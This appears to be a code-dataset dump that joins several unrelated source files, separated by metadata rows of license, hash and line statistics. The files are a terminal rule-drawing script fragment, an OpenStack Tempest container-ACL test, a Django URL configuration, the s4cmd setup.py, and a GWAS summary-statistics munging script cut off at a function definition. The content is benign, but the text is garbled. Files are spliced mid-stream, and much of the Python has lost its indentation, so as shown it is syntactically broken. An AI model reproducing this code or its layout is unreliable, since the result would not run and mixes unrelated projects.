# possible to do this automatically?
def populate_args():
"""
Convert args namespace to a dictionary, for use in the Terminal.hrule()
method.
"""
kw_dict = {}
if ARGS is not None:
if ARGS.width is not None:
kw_dict.update({'width': ARGS.width})
if ARGS.pattern is not None:
kw_dict.update({'symbols': ARGS.pattern})
if ARGS.center is True:
kw_dict.update({'centered': ARGS.center})
return kw_dict
# print arg_dic
ARG_DICT = populate_args()
if __name__ == '__main__':
Terminal.hrule(**ARG_DICT)
Terminal.output('')
| gpl-3.0 | 1,426,352,709,110,236,700 | 27.785714 | 83 | 0.6134 | false |
neerja28/Tempest | tempest/api/object_storage/test_container_acl.py | 4 | 3994 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest_lib.common.utils import data_utils
from tempest.api.object_storage import base
from tempest import config
from tempest import test
CONF = config.CONF
class ObjectTestACLs(base.BaseObjectTest):
credentials = [['operator', CONF.object_storage.operator_role],
['operator_alt', CONF.object_storage.operator_role]]
@classmethod
def setup_credentials(cls):
super(ObjectTestACLs, cls).setup_credentials()
cls.os = cls.os_roles_operator
cls.os_operator = cls.os_roles_operator_alt
@classmethod
def resource_setup(cls):
super(ObjectTestACLs, cls).resource_setup()
cls.test_auth_data = cls.os_operator.auth_provider.auth_data
def setUp(self):
super(ObjectTestACLs, self).setUp()
self.container_name = data_utils.rand_name(name='TestContainer')
self.container_client.create_container(self.container_name)
def tearDown(self):
self.delete_containers([self.container_name])
super(ObjectTestACLs, self).tearDown()
@test.idempotent_id('a3270f3f-7640-4944-8448-c7ea783ea5b6')
def test_read_object_with_rights(self):
# attempt to read object using authorized user
# update X-Container-Read metadata ACL
tenant_name = self.os_operator.credentials.tenant_name
username = self.os_operator.credentials.username
cont_headers = {'X-Container-Read': tenant_name + ':' + username}
resp_meta, body = self.container_client.update_container_metadata(
self.container_name, metadata=cont_headers,
metadata_prefix='')
self.assertHeaders(resp_meta, 'Container', 'POST')
# create object
object_name = data_utils.rand_name(name='Object')
resp, _ = self.object_client.create_object(self.container_name,
object_name, 'data')
self.assertHeaders(resp, 'Object', 'PUT')
# Trying to read the object with rights
self.object_client.auth_provider.set_alt_auth_data(
request_part='headers',
auth_data=self.test_auth_data
)
resp, _ = self.object_client.get_object(
self.container_name, object_name)
self.assertHeaders(resp, 'Object', 'GET')
@test.idempotent_id('aa58bfa5-40d9-4bc3-82b4-d07f4a9e392a')
def test_write_object_with_rights(self):
# attempt to write object using authorized user
# update X-Container-Write metadata ACL
tenant_name = self.os_operator.credentials.tenant_name
username = self.os_operator.credentials.username
cont_headers = {'X-Container-Write': tenant_name + ':' + username}
resp_meta, body = self.container_client.update_container_metadata(
self.container_name, metadata=cont_headers,
metadata_prefix='')
self.assertHeaders(resp_meta, 'Container', 'POST')
# Trying to write the object with rights
self.object_client.auth_provider.set_alt_auth_data(
request_part='headers',
auth_data=self.test_auth_data
)
object_name = data_utils.rand_name(name='Object')
resp, _ = self.object_client.create_object(
self.container_name,
object_name, 'data', headers={})
self.assertHeaders(resp, 'Object', 'PUT')
| apache-2.0 | 2,373,737,822,112,379,400 | 41.042105 | 78 | 0.658237 | false |
bicofino/Pyramboia | pyramboia/pyramboia/urls.py | 1 | 5379 | from django.conf.urls import patterns, include, url
from django.contrib import admin
from tasks.views import runTask
from tasks.views import (
    ProjectListView, ProjectCreateView, ProjectDetailView, ProjectUpdateView, ProjectDeleteView,
    HeaderListView, HeaderCreateView, HeaderDetailView, HeaderUpdateView, HeaderDeleteView,
    TargetListView, TargetCreateView, TargetDetailView, TargetUpdateView, TargetDeleteView,
    ArgumentListView, ArgumentCreateView, ArgumentDetailView, ArgumentUpdateView, ArgumentDeleteView,
    TaskListView, TaskCreateView, TaskDetailView, TaskUpdateView, TaskDeleteView)
#from tasks.api import TasksResource
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'Pyramboia.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^$', 'tasks.views.home', name='home'),
# Project URLS
url(r'^projects$',
ProjectListView.as_view(),
name='project-list'),
url(r'^project/add/$',
ProjectCreateView.as_view(),
name='project-create'),
url(r'^project/(?P<pk>[\w\d]+)/$',
ProjectDetailView.as_view(),
name='project-detail'),
url(r'^project/(?P<pk>[\w\d]+)/edit/$',
ProjectUpdateView.as_view(),
name='project-update'),
url(r'^project/(?P<pk>[\w\d]+)/delete/$',
ProjectDeleteView.as_view(),
name='project-delete'),
# Header URLS
url(r'^headers$',
HeaderListView.as_view(),
name='header-list'),
url(r'^header/add/$',
HeaderCreateView.as_view(),
name='header-create'),
url(r'^header/(?P<pk>[\w\d]+)/$',
HeaderDetailView.as_view(),
name='header-detail'),
url(r'^header/(?P<pk>[\w\d]+)/edit/$',
HeaderUpdateView.as_view(),
name='header-update'),
url(r'^header/(?P<pk>[\w\d]+)/delete/$',
HeaderDeleteView.as_view(),
name='header-delete'),
# Target URLS
url(r'^targets$',
TargetListView.as_view(),
name='target-list'),
url(r'^target/add/$',
TargetCreateView.as_view(),
name='target-create'),
url(r'^target/(?P<pk>[\w\d]+)/$',
TargetDetailView.as_view(),
name='target-detail'),
url(r'^target/(?P<pk>[\w\d]+)/edit/$',
TargetUpdateView.as_view(),
name='target-update'),
url(r'^target/(?P<pk>[\w\d]+)/delete/$',
TargetDeleteView.as_view(),
name='target-delete'),
# Argument URLS
url(r'^arguments$',
ArgumentListView.as_view(),
name='argument-list'),
url(r'^argument/add/$',
ArgumentCreateView.as_view(),
name='argument-create'),
url(r'^argument/(?P<pk>[\w\d]+)/$',
ArgumentDetailView.as_view(),
name='argument-detail'),
url(r'^argument/(?P<pk>[\w\d]+)/edit/$',
ArgumentUpdateView.as_view(),
name='argument-update'),
url(r'^argument/(?P<pk>[\w\d]+)/delete/$',
ArgumentDeleteView.as_view(),
name='argument-delete'),
# Task URLS
url(r'^tasks$',
TaskListView.as_view(),
name='task-list'),
url(r'^task/(?P<id>\d+)/run/$',
runTask, name='runTask'),
# url(r'^task/(?P<pk>[\w\d]+)/run/$',
# runTask, name='runTask'),
url(r'^task/add/$',
TaskCreateView.as_view(),
name='task-create'),
url(r'^task/(?P<pk>[\w\d]+)/$',
TaskDetailView.as_view(),
name='task-detail'),
url(r'^task/(?P<pk>[\w\d]+)/edit/$',
TaskUpdateView.as_view(),
name='task-update'),
url(r'^task/(?P<pk>[\w\d]+)/delete/$',
TaskDeleteView.as_view(),
name='task-delete'),
)
| mit | -5,152,567,834,804,699,000 | 53.887755 | 467 | 0.3971 | false |
alinikkhah/s4cmd | setup.py | 1 | 1218 | #!/usr/bin/env python
#
# Copyright 2012 BloomReach, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Super S3 command line tool, setup.py
"""
from setuptools import setup, find_packages
__author__ = "Chou-han Yang"
__copyright__ = "Copyright 2014 BloomReach, Inc."
__license__ = "http://www.apache.org/licenses/LICENSE-2.0"
__version__ = "1.5.19"
__maintainer__ = __author__
__status__ = "Development"
setup(name='s4cmd',
version=__version__,
description='Super S3 command line tool',
author=__author__,
license=__license__,
url='https://github.com/bloomreach/s4cmd',
packages=find_packages(),
scripts=['s4cmd.py'],
install_requires=['boto>=2.3.0'],
)
| apache-2.0 | 6,579,009,193,789,784,000 | 28.707317 | 74 | 0.684729 | false |
omeed-maghzian/mtag | mtag_munge.py | 1 | 36789 | #!/usr/bin/env python
from __future__ import division
from __future__ import absolute_import
from ldsc_mod.ldscore import allele_info as allele_info
import pandas as pd
import numpy as np
import os
import sys
import traceback
import gzip
import bz2
import argparse
from scipy.stats import chi2
import logging
import time
np.seterr(invalid='ignore')
try:
x = pd.DataFrame({'A': [1, 2, 3]})
x.sort_values(by='A')
except AttributeError:
raise ImportError('LDSC requires pandas version >= 0.17.0')
null_values = {
'LOG_ODDS': 0,
'OR': 1,
'Z': 0,
'BETA': 0
}
## default column names
def set_default_cnames(args):
return {
# snpid
'SNPID': 'SNP',
'SNP': 'SNP',
'snp': 'SNP',
'MARKERNAME': 'SNP',
'markername': 'SNP',
'RS': 'SNP',
'RSID': 'SNP',
'RS_NUMBER': 'SNP',
'RS_NUMBERS': 'SNP',
'rsID': 'SNP',
'snpid':'SNP',
# n
'N': 'N',
'n': 'N',
'sample_size': 'N',
'ncol': 'N',
# freq
'FREQ': 'FRQ',
'A1FREQ': 'FRQ',
'a1freq': 'FRQ',
'EAF': 'FRQ',
'eaf': 'FRQ',
'FRQ': 'FRQ',
'frq': 'FRQ',
'AF': 'FRQ',
'FRQ': 'FRQ',
'MAF': 'FRQ',
'FRQ_U': 'FRQ',
'F_U': 'FRQ',
'freq': 'FRQ',
# chr
'CHR': 'CHR',
'Chromosome': 'CHR',
'chromosome': 'CHR',
'Chr': 'CHR',
'chr': 'CHR',
# bpos
'BPOS': 'BP',
'Bpos': 'BP',
'BP': 'BP',
'bp': 'BP',
'POS': 'BP',
'Pos': 'BP',
'pos': 'BP',
'position': 'BP',
'Position': 'BP',
'bpos': 'BP',
# a1
'A1': 'A1',
'ALLELE1': 'A1',
'allele1': 'A1',
'EFFECT_ALLELE': 'A1',
'effect_allele': 'A1',
'EA': 'A1',
'ea': 'A1',
'a1': 'A1',
# a2
'A2': 'A2',
'ALLELE0': 'A2',
'allele0': 'A2',
'ALLELE2': 'A2',
'allele2': 'A2',
'OTHER_ALLELE': 'A2',
'other_allele': 'A2',
'OA': 'A2',
'oa': 'A2',
'a2': 'A2',
# beta
'BETA': 'BETA',
'Beta': 'BETA',
'EFFECT': 'BETA',
'Effect': 'BETA',
'effect': 'BETA',
'b': 'BETA',
'beta': 'BETA',
# se
'SE': 'SE',
'SE_unadj': 'SE',
'se_unadj': 'SE',
'SE_UNADJ': 'SE',
'se': 'SE',
's': 'SE',
# z
'Z': 'Z',
'Z_unadj': 'Z',
'z_unadj': 'Z',
'Z_UNADJ': 'Z',
'z': 'Z',
'Z-score':'Z',
'z-score':'Z',
'ZSCORE':'Z',
# pval
'PVAL': 'P',
'Pval': 'P',
'P_BOLT_LMM_INF': 'P',
'P_BOLT_LMM': 'P',
'P': 'P',
'p': 'P',
'P_unadj': 'P',
'p_unadj': 'P',
'P_UNADJ': 'P',
'pval': 'P',
# info
'INFO': 'INFO',
'info': 'INFO',
'RSQ': 'INFO',
'rsq': 'INFO'
}
default_cnames = {
# RS NUMBER
'SNP': 'SNP',
'MARKERNAME': 'SNP',
'SNPID': 'SNP',
'RS': 'SNP',
'RSID': 'SNP',
'RS_NUMBER': 'SNP',
'RS_NUMBERS': 'SNP',
# NUMBER OF STUDIES
'NSTUDY': 'NSTUDY',
'N_STUDY': 'NSTUDY',
'NSTUDIES': 'NSTUDY',
'N_STUDIES': 'NSTUDY',
# P-VALUE
'P': 'P',
'PVALUE': 'P',
'P_VALUE': 'P',
'PVAL': 'P',
'P_VAL': 'P',
'GC_PVALUE': 'P',
# ALLELE 1
'A1': 'A1',
'ALLELE1': 'A1',
'ALLELE_1': 'A1',
'EFFECT_ALLELE': 'A1',
'REFERENCE_ALLELE': 'A1',
'INC_ALLELE': 'A1',
'EA': 'A1',
# ALLELE 2
'A2': 'A2',
'ALLELE2': 'A2',
'ALLELE_2': 'A2',
'OTHER_ALLELE': 'A2',
'NON_EFFECT_ALLELE': 'A2',
'DEC_ALLELE': 'A2',
'NEA': 'A2',
# N
'N': 'N',
'NCASE': 'N_CAS',
'CASES_N': 'N_CAS',
'N_CASE': 'N_CAS',
'N_CASES': 'N_CAS',
'N_CONTROLS': 'N_CON',
'N_CAS': 'N_CAS',
'N_CON': 'N_CON',
'N_CASE': 'N_CAS',
'NCONTROL': 'N_CON',
'CONTROLS_N': 'N_CON',
'N_CONTROL': 'N_CON',
'WEIGHT': 'N', # metal does this. possibly risky.
# SIGNED STATISTICS
'ZSCORE': 'Z',
'Z-SCORE': 'Z',
'GC_ZSCORE': 'Z',
'Z': 'Z',
'Z_unadj': 'Z',
'z_unadj': 'Z',
'Z_UNADJ': 'Z',
'z': 'Z',
'Z-score':'Z',
'z-score':'Z',
'OR': 'OR',
'B': 'BETA',
'BETA': 'BETA',
'SE':'SE',
'LOG_ODDS': 'LOG_ODDS',
'EFFECTS': 'BETA',
'EFFECT': 'BETA',
'SIGNED_SUMSTAT': 'SIGNED_SUMSTAT',
# info
'INFO': 'INFO',
'info': 'INFO',
'RSQ': 'INFO',
'rsq': 'INFO',
# MAF
'AF': 'FRQ',
'EAF': 'FRQ',
'FRQ': 'FRQ',
'MAF': 'FRQ',
'FRQ_U': 'FRQ',
'F_U': 'FRQ',
}
describe_cname = {
'SNP': 'Variant ID (e.g., rs number)',
'P': 'p-Value',
'A1': 'a1, interpreted as ref allele for signed sumstat.',
'A2': 'a2, interpreted as non-ref allele for signed sumstat.',
'N': 'Sample size',
'N_CAS': 'Number of cases',
'N_CON': 'Number of controls',
'Z': 'Z-score (0 --> no effect; above 0 --> A1 is trait/risk increasing)',
'OR': 'Odds ratio (1 --> no effect; above 1 --> A1 is risk increasing)',
'BETA': '[linear/logistic] regression coefficient (0 --> no effect; above 0 --> A1 is trait/risk increasing)',
'SE': 'Standard errors of BETA coefficients',
'LOG_ODDS': 'Log odds ratio (0 --> no effect; above 0 --> A1 is risk increasing)',
'INFO': 'INFO score (imputation quality; higher --> better imputation)',
'FRQ': 'Allele frequency',
'SIGNED_SUMSTAT': 'Directional summary statistic as specified by --signed-sumstats.',
'NSTUDY': 'Number of studies in which the SNP was genotyped.'
}
def read_header(fh):
'''Read the first line of a file and returns a list with the column names.'''
(openfunc, compression) = get_compression(fh)
return [x.rstrip('\n') for x in openfunc(fh).readline().split()]
def get_cname_map(flag, default, ignore):
'''
Figure out which column names to use.
Priority is
(1) ignore everything in ignore
(2) use everything in flags that is not in ignore
(3) use everything in default that is not in ignore or in flags
    The keys of flag are cleaned. The entries of ignore are not cleaned. The keys of default
are cleaned. But all equality is modulo clean_header().
'''
clean_ignore = [clean_header(x) for x in ignore]
cname_map = {x: flag[x] for x in flag if x not in clean_ignore}
cname_map.update(
{x: default[x] for x in default if x not in clean_ignore + list(flag.keys())})
return cname_map
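# Illustrative example of the priority rules above: with flag = {'NCOL': 'N'},
# default = {'N': 'N', 'P': 'P'} and ignore = ['P'], the result is {'NCOL': 'N', 'N': 'N'}:
# 'P' is dropped because it is ignored, and defaults fill in anything not set by a flag.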
def get_compression(fh):
'''
    Read filename suffixes and figure out whether the file is gzipped, bzip2'ed, or not compressed.
'''
if fh.endswith('gz'):
compression = 'gzip'
openfunc = gzip.open
elif fh.endswith('bz2'):
compression = 'bz2'
openfunc = bz2.BZ2File
else:
openfunc = open
compression = None
return openfunc, compression
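# For example, get_compression('sumstats.txt.gz') returns (gzip.open, 'gzip') and
# get_compression('sumstats.txt') returns (open, None).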
def clean_header(header):
'''
For cleaning file headers.
- convert to uppercase
- replace dashes '-' with underscores '_'
- replace dots '.' (as in R) with underscores '_'
- remove newlines ('\n')
'''
return header.upper().replace('-', '_').replace('.', '_').replace('\n', '')
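# For example, clean_header('p.value-gc\n') returns 'P_VALUE_GC'.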
def filter_pvals(P, args):
'''Remove out-of-bounds P-values'''
ii = (P > 0) & (P <= 1)
bad_p = (~ii).sum()
if bad_p > 0:
msg = 'WARNING: {N} SNPs had P outside of (0,1]. The P column may be mislabeled.'
logging.info(msg.format(N=bad_p))
return ii
def filter_info(info, args):
'''Remove INFO < args.info_min (default 0.9) and complain about out-of-bounds INFO.'''
if type(info) is pd.Series: # one INFO column
jj = ((info > 2.0) | (info < 0)) & info.notnull()
ii = info >= args.info_min
elif type(info) is pd.DataFrame: # several INFO columns
jj = (((info > 2.0) & info.notnull()).any(axis=1) | (
(info < 0) & info.notnull()).any(axis=1))
ii = (info.sum(axis=1) >= args.info_min * (len(info.columns)))
else:
raise ValueError('Expected pd.DataFrame or pd.Series.')
bad_info = jj.sum()
if bad_info > 0:
        msg = 'WARNING: {N} SNPs had INFO outside of [0,2]. The INFO column may be mislabeled.'
logging.info(msg.format(N=bad_info))
return ii
def filter_frq(frq, args):
'''
Filter on MAF. Remove MAF < args.maf_min and out-of-bounds MAF.
'''
jj = (frq < 0) | (frq > 1)
bad_frq = jj.sum()
if bad_frq > 0:
msg = 'WARNING: {N} SNPs had FRQ outside of [0,1]. The FRQ column may be mislabeled.'
logging.info(msg.format(N=bad_frq))
frq = np.minimum(frq, 1 - frq)
ii = frq > args.maf_min
return ii & ~jj
def filter_se(se, args):
'''
Filter on SE. Remove SE < 0.
'''
ii = (se >= 0)
bad_se = (~ii).sum()
if bad_se > 0:
        msg = 'WARNING: {N} SNPs had negative SE values.'
logging.info(msg.format(N=bad_se))
return ii
def filter_alleles(a, keep_str_ambig):
'''Remove alleles that do not describe strand-unambiguous SNPs'''
VALID_SNPS_list = allele_info.VALID_andSA_SNPS if keep_str_ambig else allele_info.VALID_SNPS
return a.isin(VALID_SNPS_list)
def parse_dat(dat_gen, convert_colname, merge_alleles, args):
'''Parse and filter a sumstats file chunk-wise'''
tot_snps = 0
dat_list = []
msg = 'Reading sumstats from {F} into memory {N} SNPs at a time.'
logging.info(msg.format(F=args.sumstats if args.sumstats is not None else 'provided DataFrame', N=int(args.chunksize)))
drops = {'NA': 0, 'P': 0, 'INFO': 0,
'FRQ': 0, 'A': 0, 'SNP': 0, 'MERGE': 0, 'SE': 0}
for block_num, dat in enumerate(dat_gen):
tot_snps += len(dat)
old = len(dat)
dat = dat.dropna(axis=0, how="any", subset=set(dat.columns)-set(['INFO'])).reset_index(drop=True)
#dat = dat.dropna(axis=0, how="any", subset=filter(
# lambda x: x != 'INFO', dat.columns)).reset_index(drop=True)
drops['NA'] += old - len(dat)
        dat.columns = [convert_colname[x] for x in dat.columns]
ii = np.array([True for i in range(len(dat))])
if args.merge_alleles:
old = ii.sum()
ii = dat.SNP.isin(merge_alleles.SNP)
drops['MERGE'] += old - ii.sum()
if ii.sum() == 0:
continue
dat = dat[ii].reset_index(drop=True)
ii = np.array([True for i in range(len(dat))])
if 'INFO' in dat.columns:
old = ii.sum()
ii &= filter_info(dat['INFO'], args)
new = ii.sum()
drops['INFO'] += old - new
old = new
if 'FRQ' in dat.columns:
old = ii.sum()
ii &= filter_frq(dat['FRQ'], args)
new = ii.sum()
drops['FRQ'] += old - new
old = new
if 'SE' in dat.columns:
old = ii.sum()
ii &= filter_se(dat['SE'], args)
new = ii.sum()
drops['SE'] += old - new
old = new
old = ii.sum()
if args.keep_maf:
dat.drop(
[x for x in ['INFO'] if x in dat.columns], inplace=True, axis=1)
else:
dat.drop(
[x for x in ['INFO', 'FRQ'] if x in dat.columns], inplace=True, axis=1)
ii &= filter_pvals(dat.P, args)
new = ii.sum()
drops['P'] += old - new
old = new
if not args.no_alleles:
dat.A1 = dat.A1.str.upper()
dat.A2 = dat.A2.str.upper()
ii &= filter_alleles(dat.A1 + dat.A2, args.keep_str_ambig)
new = ii.sum()
drops['A'] += old - new
old = new
if ii.sum() == 0:
continue
dat_list.append(dat[ii].reset_index(drop=True))
dat = pd.concat(dat_list, axis=0).reset_index(drop=True)
msg = 'Read {N} SNPs from --sumstats file.\n'.format(N=tot_snps)
if args.merge_alleles:
msg += 'Removed {N} SNPs not in --merge-alleles.\n'.format(
N=drops['MERGE'])
msg += 'Removed {N} SNPs with missing values.\n'.format(N=drops['NA'])
msg += 'Removed {N} SNPs with INFO <= {I}.\n'.format(
N=drops['INFO'], I=args.info_min)
msg += 'Removed {N} SNPs with MAF <= {M}.\n'.format(
N=drops['FRQ'], M=args.maf_min)
msg += 'Removed {N} SNPs with SE <0 or NaN values.\n'.format(N=drops['SE'])
msg += 'Removed {N} SNPs with out-of-bounds p-values.\n'.format(
N=drops['P'])
msg += 'Removed {N} variants that were not SNPs or were strand-ambiguous.\n'.format(
N=drops['A']) if not args.keep_str_ambig else 'Removed {N} variants that were not SNPs. Note: strand ambiguous SNPs were not dropped.\n'.format(
N=drops['A'])
msg += '{N} SNPs remain.'.format(N=len(dat))
logging.info(msg)
return dat
def process_n(dat, args):
    '''Determine sample size from --N* flags or N* columns. Filter out low N SNPs.'''
if all(i in dat.columns for i in ['N_CAS', 'N_CON']):
N = dat.N_CAS + dat.N_CON
P = dat.N_CAS / N
dat['N'] = N * P / P[N == N.max()].mean()
dat.drop(['N_CAS', 'N_CON'], inplace=True, axis=1)
# NB no filtering on N done here -- that is done in the next code block
if 'N' in dat.columns:
n_min = args.n_min if args.n_min or args.n_min==0 else dat.N.quantile(0.9) / 1.5
old = len(dat)
dat = dat[dat.N >= n_min].reset_index(drop=True)
new = len(dat)
logging.info('Removed {M} SNPs with N < {MIN} ({N} SNPs remain).'.format(
M=old - new, N=new, MIN=n_min))
elif 'NSTUDY' in dat.columns and 'N' not in dat.columns:
nstudy_min = args.nstudy_min if args.nstudy_min else dat.NSTUDY.max()
old = len(dat)
dat = dat[dat.NSTUDY >= nstudy_min].drop(
['NSTUDY'], axis=1).reset_index(drop=True)
new = len(dat)
logging.info('Removed {M} SNPs with NSTUDY < {MIN} ({N} SNPs remain).'.format(
M=old - new, N=new, MIN=nstudy_min))
if 'N' not in dat.columns:
if args.N:
dat['N'] = args.N
logging.info('Using N = {N}'.format(N=args.N))
elif args.N_cas and args.N_con:
dat['N'] = args.N_cas + args.N_con
if args.daner is None:
msg = 'Using N_cas = {N1}; N_con = {N2}'
logging.info(msg.format(N1=args.N_cas, N2=args.N_con))
else:
raise ValueError('Cannot determine N. This message indicates a bug.\n'
'N should have been checked earlier in the program.')
return dat
def p_to_z(P, N):
    '''Convert a P-value to an unsigned Z-score (the N argument is accepted but unused).'''
return np.sqrt(chi2.isf(P, 1))
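# Numerical sanity check (illustrative): chi2.isf(0.05, 1) is about 3.841, so a two-sided
# P of 0.05 maps to an unsigned Z of about 1.96; the sign is applied later from
# SIGNED_SUMSTAT (unless --a1-inc is set).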
def check_median(x, expected_median, tolerance, name):
'''Check that median(x) is within tolerance of expected_median.'''
m = np.median(x)
if np.abs(m - expected_median) > tolerance:
msg = 'WARNING: median value of {F} is {V} (should be close to {M}). This column may be mislabeled.'
raise ValueError(msg.format(F=name, M=expected_median, V=round(m, 2)))
else:
msg = 'Median value of {F} was {C}, which seems sensible.'.format(
C=m, F=name)
return msg
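# For example, check_median(dat.SIGNED_SUMSTAT, 0, 0.1, 'BETA') raises a ValueError if the
# median BETA is more than 0.1 away from 0, which usually means the column is mislabeled.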
def parse_flag_cnames(args):
'''
Parse flags that specify how to interpret nonstandard column names.
flag_cnames is a dict that maps (cleaned) arguments to internal column names
'''
cname_options = [
[args.nstudy, 'NSTUDY', '--nstudy'],
[args.snp, 'SNP', '--snp'],
[args.N_col, 'N', '--N'],
[args.N_cas_col, 'N_CAS', '--N-cas-col'],
[args.N_con_col, 'N_CON', '--N-con-col'],
[args.a1, 'A1', '--a1'],
[args.a2, 'A2', '--a2'],
[args.p, 'P', '--P'],
        [args.frq, 'FRQ', '--frq'],
[args.info, 'INFO', '--info']
]
flag_cnames = {clean_header(x[0]): x[1]
for x in cname_options if x[0] is not None}
if args.info_list:
try:
flag_cnames.update(
{clean_header(x): 'INFO' for x in args.info_list.split(',')})
except ValueError:
logging.info(
'The argument to --info-list should be a comma-separated list of column names.')
raise
null_value = None
if args.signed_sumstats:
try:
cname, null_value = args.signed_sumstats.split(',')
null_value = float(null_value)
flag_cnames[clean_header(cname)] = 'SIGNED_SUMSTAT'
except ValueError:
logging.info(
'The argument to --signed-sumstats should be column header comma number.')
raise
return [flag_cnames, null_value]
def allele_merge(dat, alleles):
'''
    WARNING: dat now contains a bunch of NA's.
    Note: dat now has the same SNPs in the same order as --merge-alleles.
'''
dat = pd.merge(
alleles, dat, how='left', on='SNP', sort=False).reset_index(drop=True)
ii = dat.A1.notnull()
a1234 = dat.A1[ii] + dat.A2[ii] + dat.MA[ii]
match = a1234.apply(lambda y: y in allele_info.MATCH_ALLELES)
jj = pd.Series(np.zeros(len(dat), dtype=bool))
jj[ii] = match
old = ii.sum()
n_mismatch = (~match).sum()
if n_mismatch < old:
logging.info('Removed {M} SNPs whose alleles did not match --merge-alleles ({N} SNPs remain).'.format(M=n_mismatch,N=old - n_mismatch))
else:
raise ValueError(
'All SNPs have alleles that do not match --merge-alleles.')
dat.loc[~jj, [i for i in dat.columns if i != 'SNP']] = float('nan')
dat.drop(['MA'], axis=1, inplace=True)
return dat
parser = argparse.ArgumentParser()
## input files and formatting
ifile = parser.add_argument_group(title='Input Files and Options', description="Input files and options to be used in munging. The --sumstats option is required.")
ifile.add_argument('--sumstats', default=None, type=str, help="Input filename.")
ifile.add_argument('--no-alleles', default=False, action="store_true",
help="Don't require alleles. Useful if only unsigned summary statistics are available "
"and the goal is h2 / partitioned h2 estimation rather than rg estimation.")
ifile.add_argument('--N', default=None, type=float,
help="Sample size If this option is not set, will try to infer the sample "
"size from the input file. If the input file contains a sample size "
"column, and this flag is set, the argument to this flag has priority.")
ifile.add_argument('--N-cas', default=None, type=float,
help="Number of cases. If this option is not set, will try to infer the number "
"of cases from the input file. If the input file contains a number of cases "
"column, and this flag is set, the argument to this flag has priority.")
ifile.add_argument('--N-con', default=None, type=float,
help="Number of controls. If this option is not set, will try to infer the number "
"of controls from the input file. If the input file contains a number of controls "
"column, and this flag is set, the argument to this flag has priority.")
ifile.add_argument('--input-datgen', default=None, action='store',
help='When calling munge_sumstats directly through Python, you can pass the generator of df chunks directly rather than reading from data.')
ifile.add_argument('--cnames', default=None, action='store',
help='list of column names that must be passed alongside the input datgen.' )
## input filtering
iformat = parser.add_argument_group(title='Input Formatting', description='Column names and some input specifications for summary statistics.')
iformat.add_argument('--snp', default=None, type=str,
help='Name of SNP column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--N-col', default=None, type=str,
help='Name of N column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--N-cas-col', default=None, type=str,
                     help='Name of N_CAS (number of cases) column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--N-con-col', default=None, type=str,
                     help='Name of N_CON (number of controls) column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--a1', default=None, type=str,
help='Name of A1 column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--a2', default=None, type=str,
help='Name of A2 column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--p', default=None, type=str,
help='Name of p-value column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--frq', default=None, type=str,
help='Name of FRQ or MAF column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--signed-sumstats', default=None, type=str,
help='Name of signed sumstat column, comma null value (e.g., Z,0 or OR,1). NB: case insensitive.')
iformat.add_argument('--info', default=None, type=str,
help='Name of INFO column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--info-list', default=None, type=str,
help='Comma-separated list of INFO columns. Will filter on the mean. NB: case insensitive.')
iformat.add_argument('--nstudy', default=None, type=str,
help='Name of NSTUDY column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--nstudy-min', default=None, type=float,
help='Minimum # of studies. Default is to remove everything below the max, unless there is an N column,'
' in which case do nothing.')
iformat.add_argument('--ignore', default=None, type=str,
help='Comma-separated list of column names to ignore.')
iformat.add_argument('--a1-inc', default=False, action='store_true',
help='A1 is the increasing allele.')
iformat.add_argument('--n-value', default=None, type=int,
help='Integer valued sample size to apply uniformly across SNPs.')
## filters
filters = parser.add_argument_group(title="Data Filters", description="Options to apply data filters to summary statistics.")
filters.add_argument('--maf-min', default=0.01, type=float, help="Minimum MAF.")
filters.add_argument('--info-min', default=0.9, type=float, help="Minimum INFO score.")
filters.add_argument('--daner', default=False, action='store_true',
help="Use this flag to parse Stephan Ripke's daner* file format.")
filters.add_argument('--daner-n', default=False, action='store_true',
help="Use this flag to parse more recent daner* formatted files, which "
"include sample size column 'Nca' and 'Nco'.")
filters.add_argument('--merge-alleles', default=None, type=str,
help="Same as --merge, except the file should have three columns: SNP, A1, A2, "
"and all alleles will be matched to the --merge-alleles file alleles.")
filters.add_argument('--n-min', default=None, type=float,
help='Minimum N (sample size). Default is (90th percentile N) / 1.5')
filters.add_argument('--chunksize', default=5e6, type=int,
help='Chunksize.')
parser.add_argument('--keep-str-ambig', default=False, action='store_true',
help=argparse.SUPPRESS) # This options allows munge sumstats to retain strand ambiguous SNPS instead of dropping them.
## output files
ofile = parser.add_argument_group(title="Output Options", description="Output directory and options.")
ofile.add_argument('--out', default=None, type=str, help="Output filename prefix.")
ofile.add_argument('--keep-maf', default=False, action='store_true',
help='Keep the MAF column (if one exists).')
ofile.add_argument('--keep-beta', default=False, action='store_true',
help='Keep the BETA column (if one exists).')
ofile.add_argument('--keep-se', default=False, action='store_true',
help='Keep the SE column (if one exists).')
ofile.add_argument('--stdout-off', default=False, action='store_true',
help='Only prints to the log file (not to console).')
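# Example invocation (illustrative; file names are placeholders):
#   python mtag_munge.py --sumstats gwas_raw.txt.gz --N 50000 --out gwas_munged \
#       --merge-alleles w_hm3.snplist --keep-maf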
def munge_sumstats(args, write_out=True, new_log=True):
